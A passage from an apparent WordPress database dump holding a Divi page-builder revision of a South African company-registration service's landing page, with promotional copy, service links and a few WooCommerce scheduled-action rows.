custom_padding=\"20px|0px|48px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" custom_padding=\"|||\" hover_enabled=\"0\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background_color=\"#0c71c3\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#ffffff\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\" body_text_color=\"rgba(28,14,13,0.88)\" body_text_color__hover_enabled=\"on\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"800ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"1000ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|700|||||||\" button_icon=\"%%144%%\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.3\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#f7f7f7\" background_color_gradient_end=\"#ffffff\" custom_padding=\"21px|0px|36px|0px|false|false\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.09)\" bottom_divider_height=\"55px\" bottom_divider_flip=\"vertical\" bottom_divider_arrangement=\"above_content\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|12px|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.74\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal;\"><strong><span style=\"color: #0c71c3;\">Other Services</span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|38px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"101px|-38px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"200ms\" animation_starting_opacity=\"10%\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"-102px|2px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 10:32:57','2019-08-08 08:32:57','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(31933,0,'2019-07-29 16:41:23','2019-07-29 16:41:23','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3f21c3d91806.18481742-Qv3dSaBH2fOFuPrZ6ArSDQJf95npUixC','','','2019-07-29 18:41:39','2019-07-29 16:41:39','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31933',0,'scheduled-action','',3),(31934,0,'2019-07-29 16:41:23','2019-07-29 16:41:23','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d3f21c3ee0d78.88064109-8mnqggZrn3xQ41UxutbNLetNGDy7bKOm','','','2019-07-29 18:41:39','2019-07-29 16:41:39','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=31934',0,'scheduled-action','',3),(31935,0,'2019-07-29 17:41:39','2019-07-29 